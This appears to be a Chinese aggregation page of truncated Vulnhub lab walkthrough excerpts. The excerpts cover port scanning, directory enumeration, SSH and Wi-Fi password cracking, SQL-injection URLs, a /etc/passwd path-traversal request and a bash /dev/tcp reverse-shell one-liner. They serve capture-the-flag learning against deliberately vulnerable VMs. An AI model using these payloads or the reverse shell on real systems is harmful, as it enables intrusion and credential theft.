dpwwn:2 Vulnhub Walkthrough】的更多相关文章

此镜像配置了静态IP地址:10.10.10.10,需要调整下网络 主机层扫描: ╰─ nmap -p1-65535 -sV -A 10.10.10.10 80/tcp    open  http      Apache httpd 2.4.38 ((Ubuntu)) 443/tcp   open  ssl/https Apache/2.4.38 (Ubuntu) 2049/tcp open nfs_acl 3 (RPC #100227)34153/tcp open nlockmgr 1-4 (R…
主机层面扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.130 22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0) 80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 3306/tcp open mysql MySQL 5.5.60-MariaDB web目录枚举 ╰─ dirb http://10.10.202.130/ ---- Scann…
下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-23 11:53 CSTNmap scan report for 10.10.202.132Host is up (0.0014s latency).Not shown: 65532 closed portsP…
下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 17:09 CSTNmap scan report for 10.10.202.131Host is up (0.0038s latency).Not shown: 65532 closed portsPO…
镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.130Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 08:57 CSTNmap scan report for 10.10.202.130Host is up (0.0029s latency).Not shown: 65525 clo…
靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: python3 dirsearch.py http://10.10.203.17/ -e html,json,php 此外还有一个phpmyadmin http://10.10.203.17/phpmyadmin/index.php 使用wpscan扫描检测插件漏洞 wpscan --url http:…
镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http://10.10.202.131/?nid=2%20and%201=2 # false http://10.10.202.131/?nid=2%20and%201=1 # true http://10.10.202.131/?nid=-2+union+select++(CONCAT_WS(0x203a2…
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 crunch 12 12 -t gam,%%@@2012 -o dict.txt ╰─ aircrack-ng -w dict.txt reality.cap gamA00fe2012 http://10.10.202.134/gamA00fe2012/realitystone.txt REALITYST…
靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 14:23 CSTNmap scan report for 10.10.202.162Host is up (0.0013s latency).Not shown: 65529 closed portsPOR…
靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出:此脚本是root每三分钟执行一次,并且www-data用户具有写入权限,因此需要想办法获取此权限,进行写入shell反弹即可 https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupa…
靶机下载链接: https://www.vulnhub.com/entry/ai-web-2,357 主机端口扫描: 尝试SQL注入,未发现有注入漏洞,就注册创建于一账户 http://10.10.202.160/userpage.php 漏洞库搜索下: XuezhuLi FileSharing - Directory Traversal https://www.exploit-db.com/exploits/40009 我们爆破下目录看下 ╰─ sudo python3 dirsearch.p…
下载链接: https://www.vulnhub.com/entry/ai-web-1,353/ 主机发现扫描: 主机端口扫描 http://10.10.202.158/ 目录扫描: ╰─ sudo python3 dirsearch.py -u http://10.10.202.158 -e .php [17:11:29] 200 - 141B - /index.html[17:11:37] 200 - 82B - /robots.txt 分别进行目录探测: ╰─ sudo python3…
下载地址: https://www.vulnhub.com/entry/nezuko-1,352/ 虚拟机启动,设置IP地址DHCP获取 主机发现扫描: 主机层面扫描: ╰─ nmap -p1-65535 -A 10.10.202.155Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-06 11:01 CSTNmap scan report for 10.10.202.155Host is up (0.00058s latency).Not…
靶机下载: https://www.vulnhub.com/entry/grimtheripper-1,350/ 主机层面端口扫描: ╰─ nmap -p1-65535 -A 10.10.202.153Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-02 11:19 CSTNmap scan report for 10.10.202.153Host is up (0.0024s latency).Not shown: 65533 closed…
下载链接: https://www.vulnhub.com/entry/hackme-1,330/ 网络扫描探测: ╰─ nmap -p1-65535 -sV -A 10.10.202.131 22/tcp open  ssh 80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu)) 可够尝试SSH爆破,发现有次数限制 web入手: 右键源码找到注册接口 注册: admin #  并且成功登录 尝试搜索框注入: POST /welcome.php H…
靶机链接: https://www.vulnhub.com/entry/sunset-sunrise,406/ 主机扫描: 端口扫描: HTTP 80 目录枚举未果 HTTP 8080 Google search :Weborf/0.12.2 exploit https://www.exploit-db.com/exploits/14925 Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 成功读取文件,然后我们尝试读取一…
靶机链接: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 主机扫描: HTTP 目录访问,提示无权限,右键源码,提示XXF即可 正常访问,注册一个用户,登录,然后查看用户profile,通过id进行遍历枚举用户密码 eweuhtandingan skuyatuhsedihaingmah cedihhihihiaingmaung qwerty!!!abdikasepak dorrrrrsundatea indONEsiaalic…
靶机链接: https://www.vulnhub.com/entry/sunset-dusk,404/ 主机IP扫描: IP端口扫描: 21 端口  pyftpdlib 1.5.5 版本漏洞 25 端口  Postfix 账户枚举 80 Apache httpd 2.4.38 版本漏洞,目录枚举 3306 mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解 8080 http    PHP cli server 5.5 版本漏洞,目录…
靶机下载链接: https://www.vulnhub.com/entry/ha-dhanush,396/ 主机扫描: 主机端口扫描: HTTP目录爬取 使用dirb dirsearch 爬取均未发现可利用的目录 另外看到ssh端口开启了,进行网页爬取字典生成进行爆破 cewl http://10.10.202.147 -w dict.txt ╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr 尝试复制passwd文件提示无权限,用户sa…
靶机下载链接: https://download.vulnhub.com/djinn/djinn.ova 主机端口扫描: FTP发现一些文件提示 1337端口是一个游戏,去看下 哈哈有点难,暂时放弃,看看7331HTTP server 这边有么有发现 使用dirb dirsearch 自带字典没有发现,加大字段枚举下目录 命令执行 反弹shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直弹不出来,猜测特殊字符做了过滤 base6…
靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 FTP 有认证 HTTP目录枚举(dirb和dirsearch 多种工具使用枚举) dirb http://10.10.202.136 -X .php,.txt,.html,.xml,.yml,.json ---- Scanning URL: http://10.10.202.136/ ----+…
靶机链接: https://www.vulnhub.com/entry/happycorp-1,296/ 网络主机扫描::: 主机端口扫描: NFS文件系统,尝试挂载试试 mount -t nfs 10.10.202.135:/home/karl /mnt 提示没权限打开.这里暂时放一放,看看HTTP方面,有个admin.php后台能不能上传,拿shell web页面收集用户信息: heather 提示密码错误carolyn 账户不存在rodney  账户不存在jennifer 账户不存在 存在…
靶机地址: https://www.vulnhub.com/entry/mumbai-1,372/ 主机探测: 主机端口扫描: FTP 下载Note文件 TODO: Move these multiple HTTP Servers running to Docker. I hear containers make things inherentlysecure - maybe this will shut those security researchers up. Also, don't fo…
靶机链接: https://www.vulnhub.com/entry/ha-chakravyuh,388/ 主机探测扫描: 端口扫描: ╰─ nmap -p- -sC -sV 10.10.202.131 FTP 匿名访问 下载压缩文件,解压缩需要密码,基本套路一直,需要密码,接下来就是找解压密码的事情了 目录枚举下 phpmyadmin 尝试弱口令密码爆破未果 phpmyadmin 版本为4.6.6 无RCE之类的漏洞 那么尝试爆破下载的7z格式的压缩包文件 这里使用的工具: https://…
主机扫描: http://10.10.202.130/ <!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK--> 进行解码: --WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-- --ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K-- --d29ya2luZ2lucHJvZ3Jlc3MucGhwCg=…
主机层面扫描探测: ╰─ nmap -p1-65535 -sV -A 10.10.202.132 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 09:10 CSTNmap scan report for 10.10.202.132Host is up (0.00087s latency).Not shown: 55531 filtered ports, 10002 closed portsPORT STATE SERVICE VERS…
主机层面扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.14 PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.0.8 or later|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst: | STAT: | FTP server status:| Connected to 10.10.202.145| Logged in as ftp|…
主机层面扫描: 22 和 3306 端口 3306 端口默认是MySQL端口,但是这里尝试爆破报错,最后通http访问发现非MySQL协议,而是一个http的服务 http的协议我们进行目录枚举下 枚举到一个长传的点,我们试试访问下 http://10.10.202.10:3306/upload.html 上传反向shell试试 通过前段绕过svg的格式文件,上传PHP shell 失败,错误页面. 这里使用svg xxe 注入 漏洞 https://insinuator.net/2015/03…
主机层面扫描: ╰─ nmap -p1-65535 -A -sV 10.10.202.140 You name 存在XSS 漏洞 右键源码有隐藏form表单 修改其type属性为:text 尝试了SQL注入貌似无注入 wfuzz 下目录试试 + http://10.10.202.140/admin.php (CODE:200|SIZE:329) + http://10.10.202.140/index.php (CODE:200|SIZE:694) + http://10.10.202.140/…
主机层面端口扫描探测: ╰─ nmap -p1-65535 -A -sV 10.10.202.137 访问web服务 使用dirbuster 加大字段进行目录爆破 http://10.10.202.137/nt4stopc/index.php 看看这些问题先: Question True/False Bit Baku is the capital of Turkey? 巴库是土耳其的首都 False 0 The beginning of the French revolution is 1798…